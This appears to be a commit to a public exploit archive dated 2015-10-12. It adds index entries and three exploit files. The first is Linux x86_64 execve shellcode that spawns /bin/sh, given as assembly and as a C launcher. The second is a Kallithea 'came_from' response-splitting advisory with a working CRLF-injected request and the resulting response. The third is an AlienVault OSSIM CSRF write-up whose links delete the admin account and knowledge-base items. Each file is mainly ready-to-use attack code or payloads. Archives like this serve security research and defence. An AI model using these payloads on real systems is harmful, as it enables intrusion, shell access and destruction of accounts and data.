DB: 2015-10-12

3 new exploits

files.csv

@@ -34536,6 +34536,7 @@ id,file,description,date,author,platform,type,port
 38236,platforms/php/webapps/38236.txt,"gpEasy CMS 'section' Parameter Cross Site Scripting Vulnerability",2013-01-23,"High-Tech Bridge SA",php,webapps,0
 38237,platforms/php/webapps/38237.txt,"WordPress Chocolate WP Theme Multiple Security Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0
 38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script 'contact.php' Multiple SQL Injection Vulnerabilities",2013-01-25,AkaStep,php,webapps,0
+38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux x86_64 execve Shellcode - 22 bytes",2015-09-18,d4sh&r,lin_x86-64,shellcode,0
 38240,platforms/windows/dos/38240.py,"Wireshark 1.12.7 - Division by Zero Crash PoC",2015-09-18,spyk,windows,dos,0
 38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection",2015-09-18,jsass,php,webapps,80
 38242,platforms/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",hardware,remote,0
@@ -34685,6 +34686,7 @@ id,file,description,date,author,platform,type,port
 38394,platforms/windows/remote/38394.py,"BlazeVideo HDTV Player Standard '.PLF' File Remote Buffer Overflow Vulnerability",2013-03-19,metacom,windows,remote,0
 38395,platforms/jsp/webapps/38395.txt,"ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal",2015-10-05,xistence,jsp,webapps,8080
 38399,platforms/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow",2015-10-05,hyp3rlinx,windows,dos,0
+38400,platforms/php/webapps/38400.txt,"AlienVault OSSIM - CSRF Vulnerabilities",2015-10-05,"MohamadReza Mohajerani",php,webapps,0
 38403,platforms/win32/local/38403.txt,"Truecrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",win32,local,0
 38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0
 38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack-Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0
@@ -34706,6 +34708,7 @@ id,file,description,date,author,platform,type,port
 38421,platforms/linux/dos/38421.txt,"Apache Subversion 1.6.x 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability",2013-04-05,anonymous,linux,dos,0
 38422,platforms/linux/dos/38422.txt,"Apache Subversion Remote Denial of Service Vulnerability",2013-04-05,"Greg McMullin",linux,dos,0
 38423,platforms/windows/local/38423.py,"VeryPDF Image2PDF Converter SEH Buffer Overflow",2015-10-08,"Robbie Corley",windows,local,0
+38424,platforms/multiple/webapps/38424.txt,"Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability",2015-10-08,LiquidWorm,multiple,webapps,0
 38425,platforms/php/webapps/38425.txt,"PHP Address Book /addressbook/register/delete_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
 38426,platforms/php/webapps/38426.txt,"PHP Address Book /addressbook/register/edit_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
 38427,platforms/php/webapps/38427.txt,"PHP Address Book /addressbook/register/edit_user_save.php Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0

platforms/lin_x86-64/shellcode/38239.asm

@@ -0,0 +1,35 @@
+;Title: execve shellcode 22 bytes
+;Author: d4sh&r
+;Contact: https://mx.linkedin.com/in/d4v1dvc
+;Category: Shellcode
+;Architecture:linux x86_64
+;SLAE64-1379
+;Description:
+;Shellcode in 22 bytes to get a shell 
+;Tested on : Linux kali64 3.18.0-kali3-amd64 #1 SMP Debian 3.18.6-1~kali2 x86_64 GNU/Linux
+
+;Compilation and execution
+;nasm -felf64 shell.nasm -o shell.o
+;ld shell.o -o shell
+;./shell
+
+global _start
+
+_start:
+	mul esi
+	push rdx                         
+	mov rbx, 0x68732f2f6e69622f ;/bin//sh 
+	push rbx
+	lea rdi, [rsp] ;address of /bin//sh
+	mov al, 59 ;execve
+	syscall
+
+/*compile with gcc -fno-stack-protector -z exestack */
+
+unsigned char code[] = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05";
+
+main()
+{
+   int (*ret)()=(int(*)()) code;
+    ret();
+}

platforms/multiple/webapps/38424.txt

@@ -0,0 +1,85 @@
+
+Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability
+
+
+Vendor: Kallithea
+Product web page: https://www.kallithea-scm.org
+Version affected: 0.2.9 and 0.2.2
+
+Summary: Kallithea, a member project of Software Freedom Conservancy,
+is a GPLv3'd, Free Software source code management system that supports
+two leading version control systems, Mercurial and Git, and has a web
+interface that is easy to use for users and admins.
+
+Desc: Kallithea suffers from a HTTP header injection (response splitting)
+vulnerability because it fails to properly sanitize user input before
+using it as an HTTP header value via the GET 'came_from' parameter in
+the login instance. This type of attack not only allows a malicious
+user to control the remaining headers and body of the response the
+application intends to send, but also allow them to create additional
+responses entirely under their control.
+
+Tested on: Kali
+           Python
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2015-5267
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php
+Vendor: https://kallithea-scm.org/news/release-0.3.html
+Vendor Advisory: https://kallithea-scm.org/security/cve-2015-5285.html
+CVE ID: 2015-5285
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285
+
+
+21.09.2015
+
+--
+
+
+GET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
+Host: 192.168.0.28:8080
+Content-Length: 0
+Cache-Control: max-age=0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Origin: http://192.168.0.28:8080
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.8
+Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438
+
+###
+
+HTTP/1.1 302 Found
+Cache-Control: no-cache
+Content-Length: 411
+Content-Type: text/html; charset=UTF-8
+Date: Mon, 21 Sep 2015 13:58:05 GMT
+Location: http://192.168.0.28:8080/_admin/d47b5
+X-Forwarded-Host: http://zeroscience.mk
+Location: http://zeroscience.mk

+Pragma: no-cache
+Server: waitress
+
+<html>
+ <head>
+  <title>302 Found</title>
+ </head>
+ <body>
+  <h1>302 Found</h1>
+  The resource was found at <a href="http://192.168.0.28:8080/_admin/d47b5
+X-Forwarded-Host: http://zeroscience.mk
+Location: http://zeroscience.mk
">http://192.168.0.28:8080/_admin/d47b5
+X-Forwarded-Host: http://zeroscience.mk
+Location: http://zeroscience.mk
</a>;
+you should be redirected automatically.
+
+
+ </body>
+</html>

platforms/php/webapps/38400.txt

@@ -0,0 +1,46 @@
+# Exploit Title: [AlienVault - ossim CSRF]
+# Date: [10-5-2015]
+# Exploit Author: [MohamadReza Mohajerani]
+# Vendor Homepage: [www.alienvault.com]
+# Software Link: [https://www.alienvault.com/products/ossim]
+# Version: [Tested on 4.3]
+
+Vulnerability Details:
+
+=====================
+
+
+Multiple CSRF vectors exists within AlienVault ossim allowing the following
+attacks:
+
+1)Delete user accounts(ex.admin account)
+
+2)Delete knowledge DB items
+
+Exploit code(s):
+
+===============
+
+The only thing the attacker needs to do is sending the following link to
+the victim via GET request , if the victim authenticated on the ossim and
+click on the link the following attacks can be occurred :
+
+1)For deleting the
+knowledge DB items just send the link below:
+https://ossim-ip/ossim/repository/repository_delete.php?id_document=10232
+
+
+[id_document is the item number which you want to delete (it starts from 1)]
+
+2)For deleting the user accounts (ex.admin account) use the link below :
+https://ossim-ip/ossim/session/deleteuser.php?user=admin&_=1444042812845
+
+[the random number (1444042812845) is not important at all and you can
+change the number to whatever you want]
+
+
+
+Severity Level:
+
+================
+High